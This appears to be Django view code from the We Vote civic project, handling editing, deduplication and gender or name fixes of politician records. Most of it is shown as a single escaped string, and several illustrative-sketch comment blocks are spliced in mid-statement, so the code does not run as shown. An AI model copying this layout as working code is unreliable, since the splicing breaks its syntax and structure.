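# NOTE (illustrative sketch): the "pop the first filter, then OR in the rest"
# loop above can also be expressed with functools.reduce; equivalent behavior,
# shown only as an alternative formulation, not what this file does.
import operator
from functools import reduce

def combine_filters_with_or(q_filters):
    return reduce(operator.or_, q_filters) if q_filters else None
# e.g. duplicate_politician_list = duplicate_politician_list.filter(
#          combine_filters_with_or(filters))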
'politician_phone_number2': politician_phone_number2,\n            'politician_phone_number3': politician_phone_number3,\n            'politician_position_list': politician_position_list,\n            'politician_twitter_handle': politician_twitter_handle,\n            'politician_twitter_handle2': politician_twitter_handle2,\n            'politician_twitter_handle3': politician_twitter_handle3,\n            'politician_twitter_handle4': politician_twitter_handle4,\n            'politician_twitter_handle5': politician_twitter_handle5,\n            'politician_contact_form_url': politician_contact_form_url,\n            'politician_url': politician_url,\n            'politician_url2': politician_url2,\n            'politician_url3': politician_url3,\n            'politician_url4': politician_url4,\n            'politician_url5': politician_url5,\n            'political_party': political_party,\n            'rating_list': rating_list,\n            'related_candidate_list': related_candidate_list,\n            'related_representative_list': related_representative_list,\n            'state_code': state_code,\n            'vote_smart_id': vote_smart_id,\n            'web_app_root_url': web_app_root_url,\n        }\n    else:\n        template_values = {\n            'messages_on_stage': messages_on_stage,\n            # Incoming variables\n            'vote_smart_id': vote_smart_id,\n        }\n    return render(request, 'politician/politician_edit.html', template_values)\n\n\n@login_required\ndef politician_not_duplicates_view(request):\n    # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n    authority_required = {'verified_volunteer'}\n    if not voter_has_authority(request, authority_required):\n        return redirect_to_sign_in_page(request, authority_required)\n\n    politician1_we_vote_id = request.GET.get('politician1_we_vote_id', '')\n    politician2_we_vote_id = request.GET.get('politician2_we_vote_id', '')\n    state_code = request.GET.get('state_code', '')\n\n    politician_manager = PoliticianManager()\n    results = politician_manager.update_or_create_politicians_are_not_duplicates(\n        politician1_we_vote_id, politician2_we_vote_id)\n    if results['success']:\n        queryset = PoliticiansArePossibleDuplicates.objects.filter(\n            politician1_we_vote_id__iexact=politician1_we_vote_id,\n            politician2_we_vote_id__iexact=politician2_we_vote_id,\n        )\n        queryset.delete()\n\n    if not results['new_politicians_are_not_duplicates_created']:\n        messages.add_message(request, messages.ERROR, 'Could not save politicians_are_not_duplicates entry: ' +\n                             results['status'])\n    else:\n        messages.add_message(request, messages.INFO, 'Two politicians marked as not duplicates.')\n    return HttpResponseRedirect(reverse('politician:duplicates_list', args=()) +\n                                \"?state_code=\" + str(state_code))\n\n\ndef politician_change_gender_id_view(changes):\n    count = 0\n    for change in changes:\n        try:\n            politician_query = Politician.objects.filter(we_vote_id=change['we_vote_id'])\n            politician_list = list(politician_query)\n            politician = politician_list[0]\n            if change['gender'] == 'S':  # If set to \"Save Unknown\", then save as \"Unknown\"\n                setattr(politician, 'gender', UNKNOWN)\n                setattr(politician, 'gender_likelihood', POLITICAL_DATA_MANAGER)\n            else:\n                setattr(politician, 'gender', change['gender'])\n            if 'gender_likelihood' in change:\n                try:\n                    setattr(politician, 'gender_likelihood', change['gender_likelihood'])\n                except Exception as err:\n                    logger.error('politician_change_gender_id gender_likelihood caught: %s', err)\n            timezone = pytz.timezone(\"America/Los_Angeles\")\n            datetime_now = timezone.localize(datetime.now())\n            setattr(politician, 'date_last_changed', datetime_now)\n            politician.save()\n            count += 1\n        except Exception as err:\n            
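# NOTE (illustrative sketch): the Pacific-time date_last_changed stamp used in
# the change loops above and below, isolated into one helper. pytz and
# datetime are the same libraries this file already relies on; the helper
# name `pacific_now` is introduced here only for illustration.
import pytz
from datetime import datetime

def pacific_now():
    timezone = pytz.timezone("America/Los_Angeles")
    return timezone.localize(datetime.now())  # timezone-aware "now"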
logger.error('politician_change_gender_id caught: %s', err)\n            count = -1\n\n    return count\n\n\n@login_required\ndef set_missing_gender_ids_view(request):\n    \"\"\"\n    Display politicians that are missing gender identification, so they can be repaired\n    https://wevotedeveloper.com:8000/apis/v1/set_missing_gender_ids/?start=0&count=25\n    :param request:\n    :return:\n    \"\"\"\n    # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n    authority_required = {'verified_volunteer'}\n    if not voter_has_authority(request, authority_required):\n        return redirect_to_sign_in_page(request, authority_required)\n\n    start = int(request.GET.get('start', 0))\n    count = int(request.GET.get('count', 15))\n    show_unknowns = request.GET.get('show_unknowns', True)\n    politician_manager = PoliticianManager()\n    list_of_people_from_db, number_of_rows = politician_manager.retrieve_politicians_with_no_gender_id(\n        start, count, show_unknowns)\n    people_list = []\n    for person in list_of_people_from_db:\n        if not hasattr(person, 'politician_name'):\n            continue\n        name = person.politician_name\n        cleaned = re.sub(\"\\(|\\)|\\\"|\\'\", \" \", name)\n        cleaned = re.sub(\"\\s+\", \"+\", cleaned)\n        search = 'https://www.google.com/search?q=' + cleaned\n        politician_url = \"/politician/{politician_id}/edit\".format(politician_id=person.id)\n        politician_state_code = person.state_code.upper() if person.state_code else ''\n        politician_political_party = person.political_party.lower().capitalize() if person.political_party else ''\n\n        person_item = {\n            'person_name': name,\n            'politician_url': politician_url,\n            'search_url': search,\n            'gender': person.gender,\n            'gender_guess': person.guess,\n            'displayable_guess': person.displayable_guess,\n            'google_civic_candidate_name': person.google_civic_candidate_name,\n            'date_last_updated': person.date_last_updated,\n            'state_code': politician_state_code,\n            'we_vote_id': person.we_vote_id,\n            'we_vote_hosted_profile_image_url_medium': person.we_vote_hosted_profile_image_url_medium,\n            'party': politician_political_party,\n        }\n        people_list.append(person_item)\n\n    template_values = {\n        'number_of_rows': f'{number_of_rows:,}',\n        'people_list': people_list,\n        'index_offset': start,\n        'show_unknowns': show_unknowns,\n        'return_link': '/politician/',\n    }\n    return render(request, 'politician/politician_gender_id_fix_list.html', template_values)\n\n\ndef politician_change_names(changes):\n    count = 0\n    for change in changes:\n        try:\n            politician_query = Politician.objects.filter(we_vote_id=change['we_vote_id'])\n            politician_list = list(politician_query)\n            politician = politician_list[0]\n            setattr(politician, 'politician_name', change['name_after'])\n            timezone = pytz.timezone(\"America/Los_Angeles\")\n            datetime_now = timezone.localize(datetime.now())\n            setattr(politician, 'date_last_changed', datetime_now)\n            politician.save()\n            count += 1\n        except Exception as err:\n            logger.error('politician_change_names caught: %s', err)\n            count = -1\n\n    return count\n\n\n@login_required\ndef politician_edit_process_view(request):\n    \"\"\"\n    Process the new or edit politician forms\n    :param request:\n    :return:\n    \"\"\"\n    # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n    authority_required = {'verified_volunteer'}\n    if not voter_has_authority(request, authority_required):\n        return redirect_to_sign_in_page(request, authority_required)\n\n    status = ''\n    success = True\n    update_message = ''\n\n    ballot_guide_official_statement = 
request.POST.get('ballot_guide_official_statement', False)\n ballotpedia_politician_name = request.POST.get('ballotpedia_politician_name', False)\n ballotpedia_politician_url = request.POST.get('ballotpedia_politician_url', False)\n birth_date = request.POST.get('birth_date', False)\n first_name = request.POST.get('first_name', False)\n gender = request.POST.get('gender', 'False')\n middle_name = request.POST.get('middle_name', False)\n last_name = request.POST.get('last_name', False)\n facebook_url = request.POST.get('facebook_url', False)\n facebook_url2 = request.POST.get('facebook_url2', False)\n facebook_url3 = request.POST.get('facebook_url3', False)\n google_civic_candidate_name = request.POST.get('google_civic_candidate_name', False)\n google_civic_candidate_name2 = request.POST.get('google_civic_candidate_name2', False)\n google_civic_candidate_name3 = request.POST.get('google_civic_candidate_name3', False)\n instagram_handle = request.POST.get('instagram_handle', False)\n if positive_value_exists(instagram_handle):\n instagram_handle = extract_instagram_handle_from_text_string(instagram_handle)\n linkedin_url = request.POST.get('linkedin_url', False)\n maplight_id = request.POST.get('maplight_id', False)\n politician_email = request.POST.get('politician_email', False)\n politician_email2 = request.POST.get('politician_email2', False)\n politician_email3 = request.POST.get('politician_email3', False)\n politician_id = request.POST.get('politician_id', 0)\n politician_id = convert_to_int(politician_id)\n politician_name = request.POST.get('politician_name', False)\n politician_phone_number = request.POST.get('politician_phone_number', False)\n politician_phone_number2 = request.POST.get('politician_phone_number2', False)\n politician_phone_number3 = request.POST.get('politician_phone_number3', False)\n try:\n politician_photo_file = request.FILES['politician_photo_file']\n politician_photo_file_found = True\n except Exception as e:\n politician_photo_file = None\n politician_photo_file_found = False\n politician_photo_file_delete = positive_value_exists(request.POST.get('politician_photo_file_delete', False))\n politician_twitter_handle = request.POST.get('politician_twitter_handle', False)\n if positive_value_exists(politician_twitter_handle):\n politician_twitter_handle = extract_twitter_handle_from_text_string(politician_twitter_handle)\n politician_twitter_handle2 = request.POST.get('politician_twitter_handle2', False)\n if positive_value_exists(politician_twitter_handle2) or politician_twitter_handle2 == '':\n politician_twitter_handle2 = extract_twitter_handle_from_text_string(politician_twitter_handle2)\n politician_twitter_handle3 = request.POST.get('politician_twitter_handle3', False)\n if positive_value_exists(politician_twitter_handle3) or politician_twitter_handle3 == '':\n politician_twitter_handle3 = extract_twitter_handle_from_text_string(politician_twitter_handle3)\n politician_twitter_handle4 = request.POST.get('politician_twitter_handle4', False)\n if positive_value_exists(politician_twitter_handle4) or politician_twitter_handle4 == '':\n politician_twitter_handle4 = extract_twitter_handle_from_text_string(politician_twitter_handle4)\n politician_twitter_handle5 = request.POST.get('politician_twitter_handle5', False)\n if positive_value_exists(politician_twitter_handle5) or politician_twitter_handle5 == '':\n politician_twitter_handle5 = extract_twitter_handle_from_text_string(politician_twitter_handle5)\n politician_contact_form_url = 
request.POST.get('politician_contact_form_url', False)\n politician_url = request.POST.get('politician_url', False)\n politician_url2 = request.POST.get('politician_url2', False)\n politician_url3 = request.POST.get('politician_url3', False)\n politician_url4 = request.POST.get('politician_url4', False)\n politician_url5 = request.POST.get('politician_url5', False)\n political_party = request.POST.get('political_party', False)\n profile_image_type_currently_active = request.POST.get('profile_image_type_currently_active', False)\n politician_we_vote_id = request.POST.get('politician_we_vote_id', False)\n seo_friendly_path = request.POST.get('seo_friendly_path', False)\n state_code = request.POST.get('state_code', False)\n twitter_handle_updates_failing = request.POST.get('twitter_handle_updates_failing', False)\n twitter_handle_updates_failing = positive_value_exists(twitter_handle_updates_failing)\n twitter_handle2_updates_failing = request.POST.get('twitter_handle2_updates_failing', False)\n twitter_handle2_updates_failing = positive_value_exists(twitter_handle2_updates_failing)\n vote_smart_id = request.POST.get('vote_smart_id', False)\n vote_usa_politician_id = request.POST.get('vote_usa_politician_id', False)\n wikipedia_url = request.POST.get('wikipedia_url', False)\n youtube_url = request.POST.get('youtube_url', False)\n # is_battleground_race_ values taken in below\n\n # Check to see if this politician already exists\n politician_on_stage_found = False\n politician_on_stage = Politician()\n politician_manager = PoliticianManager()\n if positive_value_exists(politician_id):\n try:\n politician_query = Politician.objects.filter(id=politician_id)\n if len(politician_query):\n politician_on_stage = politician_query[0]\n politician_we_vote_id = politician_on_stage.we_vote_id\n politician_on_stage_found = True\n except Exception as e:\n messages.add_message(request, messages.ERROR, 'Could not retrieve politician: ' + str(e))\n success = False\n\n # Check to see if there is a duplicate politician already saved\n existing_politician_found = False\n if not positive_value_exists(politician_id):\n try:\n filter_list = Q()\n\n at_least_one_filter = False\n if positive_value_exists(vote_smart_id):\n at_least_one_filter = True\n filter_list |= Q(vote_smart_id=vote_smart_id)\n if positive_value_exists(maplight_id):\n at_least_one_filter = True\n filter_list |= Q(maplight_id=maplight_id)\n if positive_value_exists(politician_twitter_handle):\n at_least_one_filter = True\n filter_list |= (\n Q(politician_twitter_handle=politician_twitter_handle) |\n Q(politician_twitter_handle2=politician_twitter_handle) |\n Q(politician_twitter_handle3=politician_twitter_handle) |\n Q(politician_twitter_handle4=politician_twitter_handle) |\n Q(politician_twitter_handle5=politician_twitter_handle)\n )\n if positive_value_exists(politician_twitter_handle2):\n at_least_one_filter = True\n filter_list |= (\n Q(politician_twitter_handle=politician_twitter_handle2) |\n Q(politician_twitter_handle2=politician_twitter_handle2) |\n Q(politician_twitter_handle3=politician_twitter_handle2) |\n Q(politician_twitter_handle4=politician_twitter_handle2) |\n Q(politician_twitter_handle5=politician_twitter_handle2)\n )\n if positive_value_exists(politician_twitter_handle3):\n at_least_one_filter = True\n filter_list |= (\n Q(politician_twitter_handle=politician_twitter_handle3) |\n Q(politician_twitter_handle2=politician_twitter_handle3) |\n Q(politician_twitter_handle3=politician_twitter_handle3) |\n 
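# NOTE (illustrative sketch): each five-way OR in the duplicate check here
# matches one handle against all five politician_twitter_handle columns; the
# same Q object can be built in a loop. An empty Q() is the identity for |=,
# so this reduces to the expression written out longhand in this view.
# The helper name `q_for_any_handle_column` is hypothetical.
from django.db.models import Q

def q_for_any_handle_column(handle):
    columns = ['politician_twitter_handle'] + \
        ['politician_twitter_handle%d' % n for n in range(2, 6)]
    combined = Q()
    for column in columns:
        combined |= Q(**{column: handle})
    return combined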
Q(politician_twitter_handle4=politician_twitter_handle3) |\n Q(politician_twitter_handle5=politician_twitter_handle3)\n )\n if positive_value_exists(politician_twitter_handle4):\n at_least_one_filter = True\n filter_list |= (\n Q(politician_twitter_handle=politician_twitter_handle4) |\n Q(politician_twitter_handle2=politician_twitter_handle4) |\n Q(politician_twitter_handle3=politician_twitter_handle4) |\n Q(politician_twitter_handle4=politician_twitter_handle4) |\n Q(politician_twitter_handle5=politician_twitter_handle4)\n )\n if positive_value_exists(politician_twitter_handle5):\n at_least_one_filter = True\n filter_list |= (\n Q(politician_twitter_handle=politician_twitter_handle5) |\n Q(politician_twitter_handle2=politician_twitter_handle5) |\n Q(politician_twitter_handle3=politician_twitter_handle5) |\n Q(politician_twitter_handle4=politician_twitter_handle5) |\n Q(politician_twitter_handle5=politician_twitter_handle5)\n )\n\n if at_least_one_filter:\n politician_duplicates_query = Politician.objects.filter(filter_list)\n\n if len(politician_duplicates_query):\n existing_politician_found = True\n except Exception as e:\n messages.add_message(request, messages.ERROR, 'Could not retrieve politician: ' + str(e))\n success = False\n\n # We can use the same url_variables with any processing failures below\n url_variables = \"?ballot_guide_official_statement=\" + str(ballot_guide_official_statement) + \\\n \"&ballotpedia_politician_name=\" + str(ballotpedia_politician_name) + \\\n \"&ballotpedia_politician_url=\" + str(ballotpedia_politician_url) + \\\n \"&state_code=\" + str(state_code) + \\\n \"&google_civic_candidate_name=\" + str(google_civic_candidate_name) + \\\n \"&google_civic_candidate_name2=\" + str(google_civic_candidate_name2) + \\\n \"&google_civic_candidate_name3=\" + str(google_civic_candidate_name3) + \\\n \"&instagram_handle=\" + str(instagram_handle) + \\\n \"&politician_contact_form_url=\" + str(politician_contact_form_url) + \\\n \"&politician_name=\" + str(politician_name) + \\\n \"&politician_email=\" + str(politician_email) + \\\n \"&politician_email2=\" + str(politician_email2) + \\\n \"&politician_email3=\" + str(politician_email3) + \\\n \"&politician_phone_number=\" + str(politician_phone_number) + \\\n \"&politician_phone_number2=\" + str(politician_phone_number2) + \\\n \"&politician_phone_number3=\" + str(politician_phone_number3) + \\\n \"&politician_twitter_handle=\" + str(politician_twitter_handle) + \\\n \"&politician_twitter_handle2=\" + str(politician_twitter_handle2) + \\\n \"&politician_twitter_handle3=\" + str(politician_twitter_handle3) + \\\n \"&politician_twitter_handle4=\" + str(politician_twitter_handle4) + \\\n \"&politician_twitter_handle5=\" + str(politician_twitter_handle5) + \\\n \"&politician_url=\" + str(politician_url) + \\\n \"&politician_url2=\" + str(politician_url2) + \\\n \"&politician_url3=\" + str(politician_url3) + \\\n \"&politician_url4=\" + str(politician_url4) + \\\n \"&politician_url5=\" + str(politician_url5) + \\\n \"&politician_we_vote_id=\" + str(politician_we_vote_id) + \\\n \"&political_party=\" + str(political_party) + \\\n \"&vote_smart_id=\" + str(vote_smart_id) + \\\n \"&maplight_id=\" + str(maplight_id)\n\n if not success:\n messages.add_message(request, messages.ERROR,\n 'POLITICIAN_ERROR Please click the back arrow and report URL to the engineering team ')\n return HttpResponseRedirect(reverse('politician:politician_list', args=()) + url_variables)\n\n push_seo_friendly_path_changes = False\n try:\n if 
existing_politician_found:\n messages.add_message(request, messages.ERROR, 'This politician already exists.')\n return HttpResponseRedirect(reverse('politician:politician_new', args=()) + url_variables)\n elif politician_on_stage_found:\n # Update below\n pass\n else:\n # Create new\n required_politician_variables = True \\\n if positive_value_exists(politician_name) \\\n else False\n if required_politician_variables:\n politician_on_stage = Politician(\n first_name=extract_first_name_from_full_name(politician_name),\n middle_name=extract_middle_name_from_full_name(politician_name),\n last_name=extract_last_name_from_full_name(politician_name),\n politician_name=politician_name,\n state_code=state_code,\n )\n politician_on_stage_found = True\n if politician_on_stage_found:\n # #################################################\n # Process incoming uploaded photo if there is one\n politician_photo_in_binary_format = None\n politician_photo_converted_to_binary = False\n if politician_photo_file_found:\n try:\n politician_photo_in_binary_format = b64encode(politician_photo_file.read()).decode('utf-8')\n politician_photo_converted_to_binary = True\n except Exception as e:\n messages.add_message(request, messages.ERROR,\n \"Error converting politician photo to binary: {error}\".format(error=e))\n if politician_photo_file_found and politician_photo_converted_to_binary:\n photo_results = politician_save_photo_from_file_reader(\n politician_we_vote_id=politician_we_vote_id,\n politician_photo_binary_file=politician_photo_in_binary_format)\n if photo_results['we_vote_hosted_politician_photo_original_url']:\n we_vote_hosted_politician_photo_original_url = \\\n photo_results['we_vote_hosted_politician_photo_original_url']\n # Now we want to resize to a large version\n create_resized_image_results = create_resized_images(\n politician_we_vote_id=politician_we_vote_id,\n politician_uploaded_profile_image_url_https=we_vote_hosted_politician_photo_original_url)\n politician_on_stage.we_vote_hosted_profile_uploaded_image_url_large = \\\n create_resized_image_results['cached_resized_image_url_large']\n politician_on_stage.we_vote_hosted_profile_uploaded_image_url_medium = \\\n create_resized_image_results['cached_resized_image_url_medium']\n politician_on_stage.we_vote_hosted_profile_uploaded_image_url_tiny = \\\n create_resized_image_results['cached_resized_image_url_tiny']\n if profile_image_type_currently_active == PROFILE_IMAGE_TYPE_UNKNOWN \\\n or profile_image_type_currently_active == PROFILE_IMAGE_TYPE_UPLOADED:\n politician_on_stage.profile_image_type_currently_active = PROFILE_IMAGE_TYPE_UPLOADED\n politician_on_stage.we_vote_hosted_profile_image_url_large = \\\n politician_on_stage.we_vote_hosted_profile_uploaded_image_url_large\n politician_on_stage.we_vote_hosted_profile_image_url_medium = \\\n politician_on_stage.we_vote_hosted_profile_uploaded_image_url_medium\n politician_on_stage.we_vote_hosted_profile_image_url_tiny = \\\n politician_on_stage.we_vote_hosted_profile_uploaded_image_url_tiny\n elif profile_image_type_currently_active is not False:\n politician_on_stage.profile_image_type_currently_active = profile_image_type_currently_active\n elif politician_photo_file_delete:\n politician_on_stage.we_vote_hosted_profile_uploaded_image_url_large = None\n politician_on_stage.we_vote_hosted_profile_uploaded_image_url_medium = None\n politician_on_stage.we_vote_hosted_profile_uploaded_image_url_tiny = None\n if profile_image_type_currently_active == PROFILE_IMAGE_TYPE_UPLOADED \\\n or 
profile_image_type_currently_active == PROFILE_IMAGE_TYPE_UNKNOWN:\n politician_on_stage.profile_image_type_currently_active = PROFILE_IMAGE_TYPE_UNKNOWN\n politician_on_stage.we_vote_hosted_profile_image_url_large = None\n politician_on_stage.we_vote_hosted_profile_image_url_medium = None\n politician_on_stage.we_vote_hosted_profile_image_url_tiny = None\n elif profile_image_type_currently_active is not False:\n from image.controllers import organize_object_photo_fields_based_on_image_type_currently_active\n results = organize_object_photo_fields_based_on_image_type_currently_active(\n object_with_photo_fields=politician_on_stage,\n profile_image_type_currently_active=profile_image_type_currently_active,\n )\n if results['success']:\n politician_on_stage = results['object_with_photo_fields']\n\n # ###############################################\n # Now process all other politician fields\n if ballot_guide_official_statement is not False:\n politician_on_stage.ballot_guide_official_statement = ballot_guide_official_statement\n if ballotpedia_politician_name is not False:\n politician_on_stage.ballotpedia_politician_name = ballotpedia_politician_name\n if ballotpedia_politician_url is not False:\n politician_on_stage.ballotpedia_politician_url = ballotpedia_politician_url\n try:\n if birth_date is not False:\n if birth_date == '':\n politician_on_stage.birth_date = None\n else:\n politician_on_stage.birth_date = datetime.strptime(birth_date, '%b. %d, %Y')\n except Exception as e:\n messages.add_message(request, messages.ERROR, 'Could not save birthdate:' + str(e))\n if facebook_url is not False:\n politician_on_stage.facebook_url = facebook_url\n if facebook_url2 is not False:\n politician_on_stage.facebook_url2 = facebook_url2\n if facebook_url3 is not False:\n politician_on_stage.facebook_url3 = facebook_url3\n if first_name is not False:\n politician_on_stage.first_name = first_name\n if middle_name is not False:\n politician_on_stage.middle_name = middle_name\n if last_name is not False:\n politician_on_stage.last_name = last_name\n if gender is not False:\n gender = gender[0]\n if politician_on_stage.gender != gender:\n politician_on_stage.gender_likelihood = POLITICAL_DATA_MANAGER\n if gender == 'U':\n politician_on_stage.gender_likelihood = ''\n politician_on_stage.gender = gender\n if google_civic_candidate_name is not False:\n politician_on_stage.google_civic_candidate_name = google_civic_candidate_name\n if google_civic_candidate_name2 is not False:\n politician_on_stage.google_civic_candidate_name2 = google_civic_candidate_name2\n if google_civic_candidate_name3 is not False:\n politician_on_stage.google_civic_candidate_name3 = google_civic_candidate_name3\n if instagram_handle is not False:\n politician_on_stage.instagram_handle = instagram_handle\n is_battleground_years_list = IS_BATTLEGROUND_YEARS_AVAILABLE\n years_false_list = []\n years_true_list = []\n for year in is_battleground_years_list:\n is_battleground_race_key = 'is_battleground_race_' + str(year)\n incoming_is_battleground_race = positive_value_exists(request.POST.get(is_battleground_race_key, False))\n if hasattr(politician_on_stage, is_battleground_race_key):\n if incoming_is_battleground_race:\n years_true_list.append(year)\n else:\n years_false_list.append(year)\n setattr(politician_on_stage, is_battleground_race_key, incoming_is_battleground_race)\n years_list = list(set(years_false_list + years_true_list))\n if linkedin_url is not False:\n politician_on_stage.linkedin_url = linkedin_url\n if maplight_id is 
not False:\n politician_on_stage.maplight_id = maplight_id\n if politician_contact_form_url is not False:\n politician_on_stage.politician_contact_form_url = politician_contact_form_url\n if politician_email is not False:\n politician_on_stage.politician_email = politician_email\n if politician_email2 is not False:\n politician_on_stage.politician_email2 = politician_email2\n if politician_email3 is not False:\n politician_on_stage.politician_email3 = politician_email3\n if politician_name is not False:\n politician_on_stage.politician_name = politician_name\n if politician_phone_number is not False:\n politician_on_stage.politician_phone_number = politician_phone_number\n if politician_phone_number2 is not False:\n politician_on_stage.politician_phone_number2 = politician_phone_number2\n if politician_phone_number3 is not False:\n politician_on_stage.politician_phone_number3 = politician_phone_number3\n # Reset all politician_twitter_handles\n politician_on_stage.politician_twitter_handle = None\n politician_on_stage.politician_twitter_handle2 = None\n politician_on_stage.politician_twitter_handle3 = None\n politician_on_stage.politician_twitter_handle4 = None\n politician_on_stage.politician_twitter_handle5 = None\n if politician_twitter_handle is not False:\n add_results = add_twitter_handle_to_next_politician_spot(\n politician_on_stage, politician_twitter_handle)\n if add_results['success']:\n politician_on_stage = add_results['politician']\n if politician_twitter_handle2 is not False:\n add_results = add_twitter_handle_to_next_politician_spot(\n politician_on_stage, politician_twitter_handle2)\n if add_results['success']:\n politician_on_stage = add_results['politician']\n if politician_twitter_handle3 is not False:\n add_results = add_twitter_handle_to_next_politician_spot(\n politician_on_stage, politician_twitter_handle3)\n if add_results['success']:\n politician_on_stage = add_results['politician']\n if politician_twitter_handle4 is not False:\n add_results = add_twitter_handle_to_next_politician_spot(\n politician_on_stage, politician_twitter_handle4)\n if add_results['success']:\n politician_on_stage = add_results['politician']\n if politician_twitter_handle5 is not False:\n add_results = add_twitter_handle_to_next_politician_spot(\n politician_on_stage, politician_twitter_handle5)\n if add_results['success']:\n politician_on_stage = add_results['politician']\n if politician_url is not False:\n politician_on_stage.politician_url = politician_url\n if politician_url2 is not False:\n politician_on_stage.politician_url2 = politician_url2\n if politician_url3 is not False:\n politician_on_stage.politician_url3 = politician_url3\n if politician_url4 is not False:\n politician_on_stage.politician_url4 = politician_url4\n if politician_url5 is not False:\n politician_on_stage.politician_url5 = politician_url5\n if political_party is not False:\n political_party = convert_to_political_party_constant(political_party)\n politician_on_stage.political_party = political_party\n if state_code is not False:\n politician_on_stage.state_code = state_code\n if seo_friendly_path is not False:\n # If path isn't passed in, create one. 
If provided, verify it is unique.\n seo_results = politician_manager.generate_seo_friendly_path(\n base_pathname_string=seo_friendly_path,\n politician_name=politician_on_stage.politician_name,\n politician_we_vote_id=politician_on_stage.we_vote_id,\n state_code=politician_on_stage.state_code)\n if seo_results['success']:\n seo_friendly_path = seo_results['seo_friendly_path']\n if not positive_value_exists(seo_friendly_path):\n seo_friendly_path = None\n if seo_friendly_path != politician_on_stage.seo_friendly_path:\n # Update linked candidate & representative entries to use this latest seo_friendly_path\n push_seo_friendly_path_changes = True\n politician_on_stage.seo_friendly_path = seo_friendly_path\n\n politician_on_stage.twitter_handle_updates_failing = twitter_handle_updates_failing\n politician_on_stage.twitter_handle2_updates_failing = twitter_handle2_updates_failing\n if vote_smart_id is not False:\n politician_on_stage.vote_smart_id = vote_smart_id\n if politician_we_vote_id is not False:\n politician_on_stage.we_vote_id = politician_we_vote_id\n if vote_usa_politician_id is not False:\n politician_on_stage.vote_usa_politician_id = vote_usa_politician_id\n if wikipedia_url is not False:\n politician_on_stage.wikipedia_url = wikipedia_url\n if youtube_url is not False:\n politician_on_stage.youtube_url = youtube_url\n\n politician_on_stage.save()\n politician_we_vote_id = politician_on_stage.we_vote_id\n vote_usa_politician_id = politician_on_stage.vote_usa_politician_id\n politician_id = politician_on_stage.id\n\n # Now generate_seo_friendly_path if there isn't one\n seo_results = politician_manager.generate_seo_friendly_path(\n base_pathname_string=politician_on_stage.seo_friendly_path,\n politician_name=politician_on_stage.politician_name,\n politician_we_vote_id=politician_on_stage.we_vote_id,\n state_code=politician_on_stage.state_code)\n if seo_results['success']:\n seo_friendly_path = seo_results['seo_friendly_path']\n if positive_value_exists(seo_friendly_path):\n politician_on_stage.seo_friendly_path = seo_friendly_path\n politician_on_stage.save()\n messages.add_message(request, messages.INFO, 'Politician saved.')\n\n if positive_value_exists(politician_on_stage.linked_campaignx_we_vote_id):\n from campaign.controllers import update_campaignx_from_politician\n campaignx_manager = CampaignXManager()\n campaignx_results = campaignx_manager.retrieve_campaignx(\n campaignx_we_vote_id=politician_on_stage.linked_campaignx_we_vote_id)\n if campaignx_results['campaignx_found']:\n campaignx = campaignx_results['campaignx']\n results = update_campaignx_from_politician(campaignx=campaignx, politician=politician_on_stage)\n if results['success']:\n campaignx = results['campaignx']\n campaignx.date_last_updated_from_politician = localtime(now()).date()\n campaignx.save()\n # Find current representative for this politician\n representative_manager = RepresentativeManager()\n rep_results = representative_manager.retrieve_representative(\n politician_we_vote_id=politician_on_stage.we_vote_id)\n if rep_results['representative_found']:\n from representative.controllers import update_representative_details_from_politician\n representative = rep_results['representative']\n results = update_representative_details_from_politician(\n representative=representative,\n politician=politician_on_stage)\n if results['success']:\n if results['save_changes']:\n representative = results['representative']\n representative.date_last_updated_from_politician = localtime(now()).date()\n 
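# NOTE (illustrative sketch): generate_seo_friendly_path() (PoliticianManager)
# is used above to produce a unique, URL-safe path. This is NOT the We Vote
# implementation -- just the general slug-plus-numeric-suffix idea, using
# Django's slugify; `existing_paths` stands in for a uniqueness lookup.
from django.utils.text import slugify

def sketch_seo_friendly_path(politician_name, existing_paths):
    base = slugify(politician_name) or 'politician'
    candidate_path, suffix = base, 2
    while candidate_path in existing_paths:
        candidate_path = '%s-%d' % (base, suffix)
        suffix += 1
    return candidate_path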
representative.save()\n else:\n # messages.add_message(request, messages.INFO, 'Could not save -- missing required variables.')\n if positive_value_exists(politician_id):\n return HttpResponseRedirect(reverse('politician:politician_edit', args=(politician_id,)) +\n url_variables)\n else:\n return HttpResponseRedirect(reverse('politician:politician_new', args=()) +\n url_variables)\n\n except Exception as e:\n handle_record_not_saved_exception(e, logger=logger)\n messages.add_message(request, messages.ERROR, \"Could not save politician. Error:\" + str(e))\n return HttpResponseRedirect(reverse('politician:politician_edit', args=(politician_id,)))\n\n if positive_value_exists(politician_we_vote_id) and len(years_list) > 0:\n from politician.controllers import update_parallel_fields_with_years_in_related_objects\n results = update_parallel_fields_with_years_in_related_objects(\n field_key_root='is_battleground_race_',\n master_we_vote_id_updated=politician_we_vote_id,\n years_false_list=years_false_list,\n years_true_list=years_true_list,\n )\n if not results['success']:\n status += results['status']\n status += \"FAILED_TO_UPDATE_PARALLEL_FIELDS_FROM_POLITICIAN \"\n messages.add_message(request, messages.ERROR, status)\n\n position_list_manager = PositionListManager()\n # ##################################\n # Unlink Candidates from this Politician if \"unlink_candidate_XXXXX_from_politician\" passed in\n try:\n linked_candidate_query = CandidateCampaign.objects.all()\n linked_candidate_query = linked_candidate_query.filter(\n Q(politician_we_vote_id__iexact=politician_on_stage.we_vote_id) |\n Q(politician_id=politician_on_stage.id)\n )\n linked_candidate_list = list(linked_candidate_query)\n except Exception as e:\n messages.add_message(request, messages.ERROR, 'LINKED_CANDIDATE_PROBLEM: ' + str(e))\n linked_candidate_list = []\n for candidate in linked_candidate_list:\n if positive_value_exists(candidate.id):\n variable_name = \"unlink_candidate_\" + str(candidate.id) + \"_from_politician\"\n unlink_candidate = positive_value_exists(request.POST.get(variable_name, False))\n if positive_value_exists(unlink_candidate) and positive_value_exists(politician_we_vote_id):\n candidate.politician_we_vote_id = None\n candidate.politician_id = None\n candidate.seo_friendly_path = None\n candidate.save()\n # Now update positions\n results = position_list_manager.update_politician_we_vote_id_in_all_positions(\n candidate_we_vote_id=candidate.we_vote_id,\n new_politician_id=None,\n new_politician_we_vote_id=None)\n\n messages.add_message(request, messages.INFO,\n 'Candidate unlinked, number of positions changed: {number_changed}'\n ''.format(number_changed=results['number_changed']))\n else:\n pass\n\n # ##################################\n # Unlink Representatives from this Politician if \"unlink_representative_XXXXX_from_politician\" passed in\n try:\n linked_representative_query = Representative.objects.all()\n linked_representative_query = linked_representative_query.filter(\n 